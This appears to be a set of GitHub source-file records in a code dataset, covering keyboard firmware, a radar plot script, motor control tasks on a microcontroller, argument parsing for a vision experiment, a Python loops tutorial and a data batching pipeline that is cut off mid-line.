self._deactivate_key(key, keyboard)\n\n def _deactivate_key(self, key, keyboard):\n keyboard.cancel_timeout(self._active_keys[key])\n self._active_keys.pop(key)\n\n def during_bootup(self, keyboard):\n return\n\n def before_matrix_scan(self, keyboard):\n return\n\n def before_hid_send(self, keyboard):\n return\n\n def after_hid_send(self, keyboard):\n return\n\n def on_powersave_enable(self, keyboard):\n return\n\n def on_powersave_disable(self, keyboard):\n return\n\n def after_matrix_scan(self, keyboard):\n return\n","repo_name":"KMKfw/kmk_firmware","sub_path":"kmk/modules/rapidfire.py","file_name":"rapidfire.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","stars":1113,"dataset":"github-code","pt":"54"} +{"seq_id":"73110575200","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n# def result_pic(result):\n# \"\"\"\n# 雷达图的绘制\n# :param result: 分类数据\n# :return: 雷达图\n# \"\"\"\n# # 解析出类别标签和种类\n# labels = ['I', 'M', 'C', 'Vin', 'Ver']\n# kinds = 1\n# result=pd.read_excel('wzsj.xlsx')\n#\n# # 由于在雷达图中,要保证数据闭合,这里就再添加L列,并转换为 np.ndarray\n# result = pd.concat([result, result[['L']]], axis=1)\n# centers = np.array(result.iloc[:, 1:])\n#\n# # 分割圆周长,并让其闭合\n# n = len(labels)\n#\n#\n# angle = np.linspace(0, 2 * np.pi, n, endpoint=False)\n# angle = np.concatenate((angle, [angle[0]]))\n#\n# # 绘图\n# fig = plt.figure()\n# ax = fig.add_subplot(111, polar=True) # 参数polar, 以极坐标的形式绘制图形\n#\n# # 画线\n# for i in range(len(kinds)):\n# ax.plot(angle, centers[i], linewidth=2, label=kinds[i])\n# # ax.fill(angle, centers[i]) # 填充底色\n#\n# # 添加属性标签\n# ax.set_thetagrids(angle * 180 / np.pi, labels)\n# plt.title('different kind')\n# plt.legend(loc='lower right')\n# plt.show()\n#\n# if __name__ == '__main__':\n# result = pd.read_csv('./data_7/cluster_center.csv', sep=',')\n# result_pic(result)\nlabels = np.array(['I','M','S','Vin','Ver'])\n#数据个数\ndataLenth = 5\n#数据\ndata = np.array([0.92,0.9,0.7,1,0])\n#========自己设置结束============\n\nangles = np.linspace(0, 2*np.pi, dataLenth, endpoint=False)\ndata = np.concatenate((data, [data[0]])) # 闭合\nangles = np.concatenate((angles, [angles[0]])) # 闭合\n\nfig = plt.figure()\nax = fig.add_subplot(111, polar=True)# polar参数!!\nax.plot(angles, data, 'bo-', linewidth=2)# 画线\nax.fill(angles, data, facecolor='r', alpha=0.25)# 填充\nax.set_thetagrids(angles * 180/np.pi, labels, fontproperties=\"SimHei\")\nax.set_title(\"top2\", va='bottom', fontproperties=\"SimHei\")\nax.set_rlim(0,1)\nax.grid(True)\nplt.show()","repo_name":"jzhoujg/2020MCMCCODES","sub_path":"randa.py","file_name":"randa.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34935876058","text":"import gc\nimport pyb\nimport cotask\nimport task_share\nimport time\n\nfrom positioncontrol import PositionControlTask\nfrom motordriver import MotorDriver\nfrom encoderdriver import EncoderDriver\n\n\n\ndef system_1 ():\n \"\"\"!\n Task which facilitates the motor position control method and records\n motor 1 data in a queue. The task then prints the data which is controlled\n by a generator.\n \"\"\"\n \n ## State varible used to signal program whether to collect data, print\n # data, or terminate program.\n state = 0\n \n while True:\n \n ## Updates Current Time\n if(state == 0):\n \n # Runs position control function from positioncontrol.py\n control_A.position_control()\n \n ## Current time at which the position data is collected\n current_time_A = time.ticks_diff(time.ticks_ms(), start_time)\n \n if current_time_A > 5000:\n state = 1\n \n # Collect time list data if the queue is not full\n if time_list_A.full() == False:\n # Creates a list of Time data\n time_list_A.put(current_time_A)\n\n # Collect position data if the queue is not full \n if Position_A.full() == False:\n # Creates a list of Time data\n Position_A.put(enc_A.get_position())\n else:\n pass\n \n # States to print data\n elif state == 1:\n print('\\nTime List A\\n')\n state = 2\n \n elif state == 2:\n if time_list_A.any():\n print(time_list_A.get())\n else:\n state = 3\n \n elif state == 3:\n print('\\nEncoder Position A\\n')\n state = 4\n \n elif state == 4:\n if Position_A.any():\n print(Position_A.get())\n else:\n state = 5\n \n elif state == 5:\n print('\\nTime List B\\n')\n state = 6\n \n elif state == 6:\n if time_list_B.any():\n print(time_list_B.get())\n else:\n state = 7\n \n elif state == 7:\n print('\\nEncoder Position B\\n')\n state = 8\n \n elif state == 8:\n if Position_B.any():\n print(Position_B.get())\n else:\n state = 9\n \n # Terminate program with share0 flag\n elif (state == 9):\n print('Data has been collected')\n state = 10\n share0.put(1)\n elif (state == 10):\n pass\n\n yield (0)\n \ndef system_2 ():\n \"\"\"!\n Task which facilitates the motor position control method and records\n motor 1 data in a queue. The task then prints the data which is controlled\n by a generator.\n \"\"\"\n \n ## State varible used to signal program whether to collect data, print\n # data, or terminate program.\n state = 0\n \n while True:\n\n if (state == 0):\n \n # Runs position control function from positioncontrol.py\n control_B.position_control()\n \n ## Current time at which the position data is collected\n current_time_B = time.ticks_diff(time.ticks_ms(), start_time)\n \n if current_time_B > 5000:\n state = 1\n \n if time_list_B.full() == False:\n # Creates a list of Time data\n time_list_B.put(current_time_B)\n \n # Collect Position data if queue is not full\n if Position_B.full() == False:\n Position_B.put(enc_B.get_position())\n \n else:\n break\n \n elif (state == 1):\n pass\n \n yield (0)\n\ndef user_task ():\n \n \"\"\"!\n Task which puts things into a share and a queue.\n \"\"\"\n yield(0)\n\n# This code creates important Queue and Share variables, then starts the tasks. \n# The tasks run until the motors have reached desired position within 5 seconds\n# and data has been printed, at which time the scheduler stops and printouts \n# show diagnostic information about the tasks, share, and queue.\nif __name__ == \"__main__\":\n print ('\\033[2JTesting ME405 stuff in cotask.py and task_share.py\\r\\n'\n 'Press ENTER to stop and show diagnostics.')\n \n \n #>>>>> Initlizing Class Personal Objects <<<<<<\n\n ## Creates the motor object for motor B\n motor_B = MotorDriver(pyb.Pin.board.PA0, pyb.Pin.board.PA1, pyb.Pin.board.PC1, 5)\n\n ## Creates the motor object for motor A\n motor_A = MotorDriver(pyb.Pin.board.PB4, pyb.Pin.board.PB5, pyb.Pin.board.PA10, 3)\n\n ## Creates the encoder object for encoder B\n enc_B = EncoderDriver(pyb.Pin.board.PC6, pyb.Pin.board.PC7, 8)\n\n ## Creates the encoder object for encoder A\n enc_A = EncoderDriver(pyb.Pin.board.PB6, pyb.Pin.board.PB7, 4)\n\n ## Create the position control object for system A\n control_A = PositionControlTask(motor_A, enc_A)\n\n ## Creates the position control object for system B\n control_B = PositionControlTask(motor_B, enc_B)\n \n # Asking user to specify set point and gain for motor 1\n print('motor 1')\n control_A.set_point()\n \n control_A.set_gain()\n \n # Asking user to specify set point and gain for motor 2\n print('motor 2')\n control_B.set_point()\n \n control_B.set_gain()\n \n # Initilzing Share Objects\n \n # Shares\n # def __init__ (self, type_code, thread_protect = True, name = None):\n \n # Queue\n # def __init__ (self, type_code, size, thread_protect = True, \n # overwrite = False, name = None):\n \n ## Creates the position Queue object\n Setpos_A = task_share.Queue('i', True, name = 8)\n \n ## Creates the position of motor 1 Queue object\n Position_A = task_share.Queue('i', size = 250, thread_protect = False,\n overwrite = False, name = 1)\n\n ## Creates the position of motor 2 Queue object\n Position_B = task_share.Queue('i', size = 250, thread_protect = False,\n overwrite = False, name = 2)\n\n ## Creates the time storage Queue for motor 1\n time_list_A = task_share.Queue('i', size = 250, thread_protect = False,\n overwrite = False, name = 5)\n \n ## Creates the time storage Queue for motor 2\n time_list_B = task_share.Queue('i', size = 250, thread_protect = False,\n overwrite = False, name = 6)\n \n ## Start time to reference relative time of data recording\n start_time = time.ticks_ms()\n \n ## Counter to measure number of runs through queue\n counter_2 = 0\n \n ## Counter to measure number of runs through queue\n counter_1 = 0\n \n #>>> Start of Example Code From Ridgely<<<\n\n ## Create a flag as a Shared variable to signal the schedular should stop\n share0 = task_share.Share ('i', thread_protect = False, name = \"Share 0\")\n \n #q0 = task_share.Queue ('L', 16, thread_protect = False, overwrite = False,\n # name = \"Queue 0\")\n\n # Create the tasks. If trace is enabled for any task, memory will be\n # allocated for state transition tracing, and the application will run out\n # of memory after a while and quit. Therefore, use tracing only for \n # debugging and set trace to False when it's not needed\n \n ## Task 1 used to operate motor 1 function task\n task1 = cotask.Task (system_1, name = 'Task_1', priority = 1, \n period = 50, profile = True, trace = False)\n \n ## Task 2 used to operate motor 2 function task\n task2 = cotask.Task (system_2, name = 'Task_2', priority = 1, \n period = 50, profile = True, trace = False)\n \n \n # Add tasks to cotask schedular list\n cotask.task_list.append (task1)\n cotask.task_list.append (task2)\n\n # Run the memory garbage collector to ensure memory is as defragmented as\n # possible before the real-time scheduler is started\n gc.collect ()\n\n # Run the scheduler with the chosen scheduling algorithm. Quit if the flag\n # variable share0 has been set to 1 by the task state machine after \n # printing the data.\n \n ## Initializes VCP so that the program sees keyboard strokes.\n vcp = pyb.USB_VCP ()\n vcp.read()\n \n while share0.get() != 1:\n cotask.task_list.pri_sched()\n\n \n # Empty the comm port buffer of the character(s) just pressed\n vcp.read ()\n\n # Print a table of task data and a table of shared information data\n print ('\\n' + str (cotask.task_list))\n print (task_share.show_all ())\n print (task1.get_trace ())\n print ('\\r\\n')","repo_name":"Wyattc99/ME-405-Lab-3","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19479770829","text":"\"\"\"\nSupported arguments for train and evaluation.\n\"\"\"\n\nimport argparse\n\n\ndef train_arg_parser(argvs, extra_args_fun=None):\n parser = _common_arg_parser(description='Contrast discrimination training')\n\n _add_optimisation_group(parser)\n\n misc_group = parser.add_argument_group('miscellaneous')\n misc_group.add_argument(\n '--random_seed',\n default=None,\n type=int,\n help='To make the results more reproducible (default: None)'\n )\n misc_group.add_argument(\n '--train_params',\n default=None,\n type=str,\n help='Path to a predefined set of parameters (default: None)'\n )\n misc_group.add_argument(\n '--sf_filter',\n default=None,\n nargs='+',\n type=float,\n help='Filtering images with spatial freq (default: None)'\n )\n\n if extra_args_fun is not None:\n extra_args_fun(parser)\n\n args = parser.parse_args(argvs)\n args.colour_space = _check_dataset_space(args)\n return args\n\n\ndef test_arg_parser(argvs, extra_args_fun=None):\n parser = _common_arg_parser(description='Contrast discrimination testing')\n\n _add_optimisation_group(parser)\n _add_lesion_group(parser)\n\n misc_group = parser.add_argument_group('csf')\n misc_group.add_argument(\n '--freqs',\n default=None,\n nargs='+',\n type=float,\n help='The frequencies to be tested (default: None)'\n )\n\n if extra_args_fun is not None:\n extra_args_fun(parser)\n\n args = parser.parse_args(argvs)\n args.colour_space = _check_dataset_space(args)\n return args\n\n\ndef _check_dataset_space(args):\n # NOTE: a hack to handle preprocessing\n if 'taskonomy' in args.architecture:\n colour_space = 'taskonomy_rgb'\n elif 'clip' in args.architecture:\n colour_space = 'clip_rgb'\n else:\n colour_space = args.colour_space\n return colour_space\n\n\ndef activation_arg_parser(argvs, extra_args_fun=None):\n parser = _common_arg_parser(description='Contrast stimuli activation')\n\n _add_optimisation_group(parser)\n _add_lesion_group(parser)\n\n misc_group = parser.add_argument_group('gratings')\n misc_group.add_argument(\n '--stimuli',\n default=None,\n type=str,\n choices=['grating_radius'],\n help='The type of stimuli (default: None)'\n )\n\n if extra_args_fun is not None:\n extra_args_fun(parser)\n\n args = parser.parse_args(argvs)\n return args\n\n\ndef _common_arg_parser(description='No description!'):\n parser = ArgumentParser(description=description)\n\n _add_dataset_group(parser)\n _add_network_group(parser)\n _add_logging_group(parser)\n _add_routine_group(parser)\n _add_input_group(parser)\n\n return parser\n\n\ndef _add_logging_group(parser):\n logging_group = parser.add_argument_group('logging')\n\n logging_group.add_argument(\n '--output_dir',\n type=str,\n default='../outputs/',\n help='The path to the output directory (default: ../outputs/)'\n )\n logging_group.add_argument(\n '--experiment_name',\n type=str,\n default='anonymous',\n help='The name of the experiment (default: anonymous)'\n )\n logging_group.add_argument(\n '--print_freq',\n type=int,\n default=100,\n help='Frequency of reporting (default: 100)'\n )\n logging_group.add_argument(\n '--save_all',\n action='store_true',\n default=False,\n help='Saving all check points (default: False)'\n )\n logging_group.add_argument(\n '--visualise',\n action='store_true',\n default=False,\n help='Visualising the input images to network (default: False)'\n )\n\n\ndef _add_routine_group(parser):\n routine_group = parser.add_argument_group('routine')\n\n routine_group.add_argument(\n '--gpu',\n default=0,\n type=int,\n help='Which GPU to use (default: 0)'\n )\n routine_group.add_argument(\n '-j', '--workers',\n default=1,\n type=int,\n help='Number of workers for image generator (default: 1)'\n )\n routine_group.add_argument(\n '-b', '--batch_size',\n default=16,\n type=int,\n help='Batch size (default: 16)'\n )\n\n\ndef _add_network_group(parser):\n network_group = parser.add_argument_group('optimisation')\n\n network_group.add_argument(\n '-aname', '--architecture',\n required=True,\n type=str,\n help='Name of the architecture or network'\n )\n network_group.add_argument(\n '--resume',\n default=None,\n type=str,\n help='Path to the latest checkpoint (default: None)'\n )\n network_group.add_argument(\n '--transfer_weights',\n default=None,\n nargs='+',\n type=str,\n help='Whether transferring weights from a model (default: None)'\n )\n\n\ndef _add_optimisation_group(parser):\n optimisation_group = parser.add_argument_group('optimisation')\n\n optimisation_group.add_argument(\n '-lr', '--learning_rate',\n default=0.1,\n type=float,\n help='The learning rate parameter (default: 0.1)'\n )\n optimisation_group.add_argument(\n '--momentum',\n default=0.9,\n type=float,\n help='The momentum for optimisation (default 0.9)'\n )\n optimisation_group.add_argument(\n '-wd', '--weight_decay',\n default=1e-4,\n type=float,\n help='The decay weight parameter (default: 1e-4)'\n )\n optimisation_group.add_argument(\n '-e', '--epochs',\n default=90,\n type=int,\n help='Number of epochs (default: 90)'\n )\n optimisation_group.add_argument(\n '--initial_epoch',\n default=0,\n type=int,\n help='The initial epoch number (default: 0)'\n )\n optimisation_group.add_argument(\n '--classifier',\n default='nn',\n type=str,\n choices=[\n 'nn',\n 'linear_svm',\n 'svm',\n ],\n help='Type of the linear classifier (default: nn)'\n )\n\n\ndef _add_input_group(parser):\n input_group = parser.add_argument_group('input')\n\n input_group.add_argument(\n '--colour_space',\n default='rgb',\n type=str,\n choices=[\n 'rgb', 'imagenet_rgb', 'taskonomy_rgb',\n 'lab',\n 'grey', 'grey3'\n ],\n help='The colour space of network (default: rgb)'\n )\n input_group.add_argument(\n '--vision_type',\n default='trichromat',\n type=str,\n choices=[\n 'trichromat',\n 'monochromat',\n 'dichromat_rg',\n 'dichromat_yb'\n ],\n help='The vision type of the network (default: trichromat)'\n )\n input_group.add_argument(\n '--target_size',\n required=True,\n type=int,\n help='Target size'\n )\n input_group.add_argument(\n '--contrast_space',\n default=None,\n type=str,\n help='The channel where contrast is manipulated (default: None)'\n )\n input_group.add_argument(\n '--same_transforms',\n action='store_true',\n default=False,\n help='Applying same transforms to left/right images (default: False)'\n )\n input_group.add_argument(\n '--mask_image',\n default=None,\n type=str,\n choices=['gaussian', 'fixed_cycle', 'fixed_size'],\n help='Type of mask image (default: None)'\n )\n input_group.add_argument(\n '--grating_detector',\n action='store_true',\n default=False,\n help='Performing the task of grating detector (default: False)'\n )\n input_group.add_argument(\n '--contrasts',\n default=None,\n nargs='+',\n type=float,\n help='The contrasts to be tested (default: None)'\n )\n input_group.add_argument(\n '--illuminant',\n default=None,\n nargs='+',\n type=float,\n help='Illuminant value in the range of -0.5 to 0.5 (default: None)'\n )\n\n\ndef _add_dataset_group(parser):\n dataset_group = parser.add_argument_group('dataset')\n\n dataset_group.add_argument(\n '-dname', '--dataset',\n type=str,\n help='Name of the dataset'\n )\n dataset_group.add_argument(\n '--data_dir',\n type=str,\n default=None,\n help='The path to the data directory (default: None)'\n )\n dataset_group.add_argument(\n '--train_dir',\n type=str,\n default=None,\n help='The path to the train directory (default: None)'\n )\n dataset_group.add_argument(\n '--validation_dir',\n type=str,\n default=None,\n help='The path to the validation directory (default: None)'\n )\n dataset_group.add_argument(\n '--train_samples',\n type=int,\n default=None,\n help='Number of training samples (default: All)'\n )\n dataset_group.add_argument(\n '--val_samples',\n type=int,\n default=None,\n help='Number of validation samples (default: All)'\n )\n\n\ndef _add_lesion_group(parser):\n network_manipulation_group = parser.add_argument_group('lesion')\n\n network_manipulation_group.add_argument(\n '--lesion_kernels',\n nargs='+',\n type=str,\n default=None,\n help='First layer name followed by kernel indices (default: None)'\n )\n network_manipulation_group.add_argument(\n '--lesion_planes',\n nargs='+',\n type=str,\n default=None,\n help='Axis number followed by plane indices ax_ (default: None)'\n )\n network_manipulation_group.add_argument(\n '--lesion_lines',\n nargs='+',\n type=str,\n default=None,\n help='Intersection of two planes, ___ (default: None)'\n )\n\n\nclass ArgumentParser(argparse.ArgumentParser):\n \"\"\"\n Overriding the add_argument_group function. If a group already exists, it\n returns it, otherwise creates a new group and returns it.\n \"\"\"\n\n def add_argument_group(self, *args, **kwargs):\n ignore = ['positional arguments', 'optional arguments']\n if (\n args[0] in ignore or\n ('title' in kwargs.keys() and kwargs['title'] in ignore)\n ):\n return super().add_argument_group(*args, **kwargs)\n for group in self._action_groups:\n if (\n group.title == args[0] or\n ('title' in kwargs and group.title == kwargs['title'])\n ):\n return group\n return super().add_argument_group(*args, **kwargs)\n","repo_name":"ArashAkbarinia/DeepCSF","sub_path":"src/deepcsf/utils/argument_handler.py","file_name":"argument_handler.py","file_ext":"py","file_size_in_byte":10613,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"18542631324","text":"# -----------------\n# -- Loop => For --\n# -----------------\n# for item in iterable_object :\n# Do Something With Item\n# -----------------------------\n# item Is A Vairable You Create and Call Whenever You Want\n# item refer to the current position and will run and visit all items to the end\n# iterable_object => Sequence [ list, tuples, set, dict, string of charcaters, etc ... ]\n# ---------------------------------------------------------------\n\nmyNumbers = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n\nfor number in myNumbers:\n # print(number * 17)\n\n if number % 2 == 0: # Even\n print(f\"The Number {number} Is Even.\")\n\n else:\n print(f\"The Number {number} Is Odd.\")\n\nelse:\n print(\"The Loop Is Finished\")\n\nmyName = \"Osama\"\n\nfor letter in myName:\n print(f\" [ {letter.upper()} ] \")\n\nprint(\"===================================================\")\n\n# -----------------\n# -- Loop => For --\n# -- Trainings --\n# -----------------\n\n# Range\n\nmyRange = range(1, 101)\n\nfor number in myRange:\n\n print(number)\n\n# Dictionary\n\nmySkills = {\n \"Html\": \"90%\",\n \"Css\": \"60%\",\n \"PHP\": \"70%\",\n \"JS\": \"80%\",\n \"Python\": \"90%\",\n \"MySQL\": \"60%\"\n}\n\nprint(mySkills['JS'])\nprint(mySkills.get(\"Python\"))\n\nfor skill in mySkills:\n\n #print(skill) # will print the keys\n\n print(f\"My Progress in Lang {skill} Is: {mySkills.get(skill)}\")\n\nprint(\"===================================================\")\n\n# -----------------\n# -- Loop => For --\n# -- Nested Loop --\n# -----------------\n\npeoples = [\"Osama\", \"Ahmed\", \"Sayed\", \"Ali\"]\n\nskills = ['Html', 'Css', 'Js']\n\nfor name in peoples: # Outer Loop\n\n print(f\"{name} Skills Is: \")\n\n for skill in skills: # Inner Loop\n\n print(f\"- {skill}\")\n\n# Dictionary\n\npeoples = {\n \"Osama\": {\n \"Html\": \"70%\",\n \"Css\": \"80%\",\n \"Js\": \"70%\"\n },\n \"Ahmed\": {\n \"Html\": \"90%\",\n \"Css\": \"80%\",\n \"Js\": \"90%\"\n },\n \"Sayed\": {\n \"Html\": \"70%\",\n \"Css\": \"60%\",\n \"Js\": \"90%\"\n }\n}\n\nprint(peoples[\"Osama\"])\nprint(peoples[\"Ahmed\"])\nprint(peoples[\"Sayed\"])\n\nprint(peoples[\"Osama\"]['Css'])\nprint(peoples[\"Ahmed\"]['Css'])\nprint(peoples[\"Sayed\"]['Css'])\n\nfor name in peoples:\n\n print(f\"Skills and Progress For {name} Is: \")\n\n for skill in peoples[name]:\n\n print(f\"{skill.upper()} => {peoples[name][skill]}\")\n\nprint(\"===================================================\")\n\n# ---------------------------\n# -- Break, Continue, Pass --\n# ---------------------------\n\nmyNumbers = [1, 2, 3, 5, 7, 10, 13, 14, 15, 19]\n\n# Continue => to skip the current iteration\n\nfor number in myNumbers:\n\n if number == 13:\n\n continue # stop here and skip this iterration\n\n print(number)\n\nprint(\"#\" * 50)\n\n# Break\n\nfor number in myNumbers:\n\n if number == 13:\n\n break # etla3 bara el loop 5ales\n\n print(number)\n\nprint(\"#\" * 50)\n\n# Pass\n\nfor number in myNumbers:\n\n if number == 13:\n\n pass # dlwa2ty ana 3amlt if condition bs msh 3arfa lesa ha7ot eh gwaha fa ba7ot \"pass\" 3shan masebsh gwaha fady\n\n print(number)\n\nprint(\"===================================================\")\n\n# ------------------------------\n# -- Advanced Dictionary Loop --\n# ------------------------------\n\nmySkills = {\n \"HTML\": \"80%\",\n \"CSS\": \"90%\",\n \"JS\": \"70%\",\n \"PHP\": \"80%\"\n}\n\nprint(mySkills.items())\n\n#######################\n\nfor skill in mySkills:\n\n print(f\"{skill} => {mySkills[skill]}\")\n\nprint(\"#\"*30)\n\nfor skill_key, skill_progress in mySkills.items():\n\n print(f\"{skill_key} => {skill_progress}\")\n\nprint(\"#\"*30)\n\nmyUltimateSkills = {\n \"HTML\": {\n \"Main\": \"80%\",\n \"Pugjs\": \"80%\"\n },\n \"CSS\": {\n \"Main\": \"90%\",\n \"Sass\": \"70%\"\n }\n}\n\nfor main_key, main_value in myUltimateSkills.items():\n\n print(f\"{main_key} Progress Is: \")\n\n for child_key, child_value in main_value.items():\n\n print(f\"- {child_key} => {child_value}\")\n\n","repo_name":"NadaHe/python","sub_path":"for_loop.py","file_name":"for_loop.py","file_ext":"py","file_size_in_byte":3748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70996771363","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\nTitle: Shearlet based CNN vs. simple MLP in Fashion MNIST.\n\t\nCreated on Mon June 30 17:44:29 2020\n\n@author: Manny Ko & Ujjawal.K.Panchal \n\n\"\"\"\n#import logging\nfrom cplxmodule import cplx #new import.\nimport os, sys, time\nimport abc\nimport numpy as np\nfrom collections import namedtuple, Counter\nimport asyncio\n\n#our modules\nfrom shnetutil import projconfig\nfrom shnetutil.dataset import dataset_base\nfrom shnetutil.utils import torchutils\n\nfrom pyutils.testutil import time_spent\n\n\nkVerifyResults=False\n\n# See Docs/DataPipeline/mk_datapipelin.pdf\n# Key Influences: \n#\t- Batch Augmentation: https://arxiv.org/abs/1705.08741\n#\t- Minibatch persistency: https://arxiv.org/abs/1806.07353\n#\t- Data Echoing: https://arxiv.org/abs/1907.05550\n#\t- Bagging: \n\n# https://pymotw.com/3/asyncio/executors.html\n\nclass BatchBuilderBase(metaclass=abc.ABCMeta):\n\t\"\"\" An batch generator with support for asyncio and MP xform/augmentation,\n\t\tdata echoing etc.\n\t\"\"\"\n\tdef __init__(\n\t\tself,\n\t\tdataset,\t\t\t#utis.data.Dataset\n\t\tbatchsize=16,\n\t\tbuffersize=128,\t\t#size of our shuffle buffer\n\t\tnum_workers = 4,\t#TODO: not implemented yet\n\t\tseed=1234, \n\t\tshuffle = True,\t\t#we almost always want to shuffle\n\t):\n\t\tself.dataset = dataset\n\t\tself.batchsize = batchsize\n\t\tself.buffersize = buffersize\n\t\tself.num_workers = num_workers\n\t\tself.shuffle = shuffle\n\t\tself.size = len(dataset)\n\t\tself.indices = np.arange(self.size)\n\n\tdef __len__(self):\n\t\treturn self.size\n\n\tdef reset(self):\n\t\tpass\n\n\tdef xformbatch(self, batch):\n\t\treturn batch\n\n\tdef finalize(self):\n\t\tpass\t\n\n\t@abc.abstractmethod\n\tdef epoch(self, kLogging=False):\n\t\t\"\"\" our generator which will emit batches 1 at a time for an epoch \"\"\"\n\t\tpass\n\n\t@abc.abstractmethod\n\tdef rand_indices(self, num):\t\n\t\tpass\n\n\t@property\n\tdef shuffle_buf(self):\n\t\t\"\"\" Shuffle buffer - see https://arxiv.org/abs/1907.05550 \"\"\"\n\t\treturn self.indices\n#end if BatchBuilderBase\n\ndef getWeights(dataset):\n\t\"\"\" returns a list of weights suitable for WeightedRandomSampler or torch.multinomial.\n\tSee https://github.com/ufoym/imbalanced-dataset-sampler/blob/master/torchsampler/imbalanced.py \n\t\"\"\"\n\tlabels = getattr(dataset, 'labels', [item.label for item in dataset])\n\tlabelcnt = Counter(labels)\n\tweights = [1.0 / labelcnt[item.label] for item in dataset]\n\t#print(len(weights), np.unique(weights))\n\n\treturn weights\n\nclass BatchBuilder(BatchBuilderBase):\n\t\"\"\" An batch generator with support for asyncio and MP xform/augmentation \"\"\"\n\tdef __init__(\n\t\tself,\n\t\tdataset,\t\t\t#utis.data.Dataset\n\t\tbatchsize=16,\n\t\tbuffersize=128,\t\t#size of our shuffle buffer\n\t\tnum_workers = 4,\t#TODO: not implemented yet\n\t\tseed=1234, \n\t\tshuffle = True,\t\t#we almost always want to shuffle\n\t):\n\t\tsuper().__init__(dataset, batchsize, buffersize, num_workers, seed, shuffle)\n\t\t#TODO: use 'buffersize' - currently we are using a shuffle buffer the size of the input\n\n\t\t#https://numpy.org/doc/stable/reference/random/index.html\n\t\tss = np.random.SeedSequence(seed)\n\t\tchild_seeds = ss.spawn(num_workers)\t\t#TODO: for MP code\n\t\tself.rng = np.random.Generator(np.random.PCG64(ss))\t#PCG64|MT19937\n\t\tself.cur_batch = None \n\n\tdef xformbatch(self, batch):\n\t\treturn batch\n\n\tdef rand_indices(self, num):\t\n\t\tindices = self.rng.integers(low=0, high=self.size, size=num)\n\t\treturn indices\n\n\tdef doshuffle(self):\n\t\tif self.shuffle:\n\t\t\tself.rng.shuffle(self.indices)\n\n\tdef epoch(self, kLogging=False):\n\t\t\"\"\" our generator which will emit batches 1 at a time for an epoch \"\"\"\n\t\tself.doshuffle()\n\t\t\n\t\tif kLogging:\t\n\t\t\tprint(f\"indices: {batchbuilder.indices} {batchbuilder.indices.dtype}\")\n\n\t\tnumentries = len(self.dataset)\n\t\tbatchsize = self.batchsize\n\t\tfor start in range(0, numentries, batchsize):\n\t\t\tend = min(start + batchsize, numentries)\n\t\t\tbatch = self.indices[start:end]\n\t\t\tself.cur_batch = self.xformbatch(batch)\n\t\t\tyield self.cur_batch \t#GENERATOR\n#end.. class BatchBuilder\t\t\t\n\nclass BatchIterator():\n\tdef __init__(\n\t\tself,\n\t\tbatchbuilder\n\t):\n\t\tassert(isinstance(batchbuilder, BatchBuilderBase))\n\t\tself.builder = batchbuilder\n\t\tself.batch_num = None\n\n\tdef __iter__(self):\n\t\t\"\"\" iterator support - i.e. iter() \"\"\"\n\t\tself.batch_num = 0\n\t\treturn self\n\n\tdef __next__(self):\n\t\t\"\"\" Torch style batch iterator \n\t\t\tResult: (images, labels)\n\t\t\"\"\"\n\t\tbuilder = self.builder\n\t\tnumentries = builder.size\n\t\tbatchsize = builder.batchsize\n\n\t\tbatch_num = self.batch_num\n\t\toffset = batch_num * batchsize\n\t\tself.batch_num += 1\n\t\tif offset >= numentries: \n\t\t\traise StopIteration \n\t\tend = min(offset + batchsize, numentries)\n\t\t# Bagging here - sample with replacement\n\t\tindices = builder.indices[offset:end]\n\t\tindices = builder.rand_indices(len(indices))\n\t\tbuilder.cur_batch = indices \t\t#for Minibatch persistency and Data Echoing\n\t\timages, labels = getBatchAsync(builder.dataset, indices)\n\t\treturn images, labels\n\n\nclass Bagging(BatchBuilder):\n\t\"\"\" Use Bagging sampling to generate batches \"\"\"\n\t#TODO: Try without-replacement sampling https://papers.nips.cc/paper/6245-without-replacement-sampling-for-stochastic-gradient-methods\n\tdef __init__(\n\t\tself,\n\t\tdataset,\t\t\t#utils.data.Dataset\n\t\tbatchsize=16,\n\t\tbuffersize=128,\t\t#size of our shuffle buffer\n\t\tnum_workers = 4,\t#TODO: not implemented yet\n\t\tseed=1234, \n\t\tshuffle = False,\n\t):\n\t\tsuper().__init__(dataset, batchsize, buffersize, num_workers, seed, shuffle)\n\t\tself.cur_batch = -1\n\n\t#iterator support - i.e. iter()\t\n\tdef __iter__(self):\n\t\t\"\"\" \"\"\"\n\t\tself.batch_num = 0\n\t\treturn self\t\t#TODO: implement a standalone iterator object (to support multiple iter)\n\n\tdef __next__(self):\n\t\t\"\"\" Torch style batch iterator \n\t\t\tResult: (images, labels)\n\t\t\"\"\"\n\t\tnumentries = self.size\n\t\tbatchsize = self.batchsize\n\t\tbatch_num = self.batch_num\n\t\toffset = batch_num * batchsize\n\t\tself.batch_num += 1\n\t\tif offset >= numentries: \n\t\t\traise StopIteration \n\t\tend = min(offset + batchsize, numentries)\n\t\t# Bagging here - sample with replacement\n\t\tindices = self.indices[offset:end]\n\t\tindices = self.rand_indices(len(indices))\n\t\tself.cur_batch = indices \t\t#for Minibatch persistency and Data Echoing\n\t\timages, labels = getBatchAsync(self.dataset, indices)\n\t\treturn images, labels\n\n\tdef epoch(self, kLogging=False):\n\t\t\"\"\" Generator for sample-with-replacement -> Bagging \n\t\t\tReturn: the sample indices for maximum client side flexibility. Typically it will be used\n\t\t\t\t\tto call getBatchAsync() to do the heavy lifting.\n\t\t\"\"\"\n\t\tnumentries = self.size\n\t\tbatchsize = self.batchsize\n\n\t\tfor start in range(0, numentries, batchsize):\n#\t\t\tprint(f\"epoch[{start}]\", end='')\n\t\t\tend = min(start + batchsize, numentries)\n\t\t\t# Bagging here - sample with replacement\n\t\t\tindices = self.indices[start:end]\n\t\t\t#sample-with-replacement -> Bagging\n\t\t\tindices = self.rng.integers(numentries, size=len(indices))\n\t\t\tself.cur_batch = indices \t\t#for 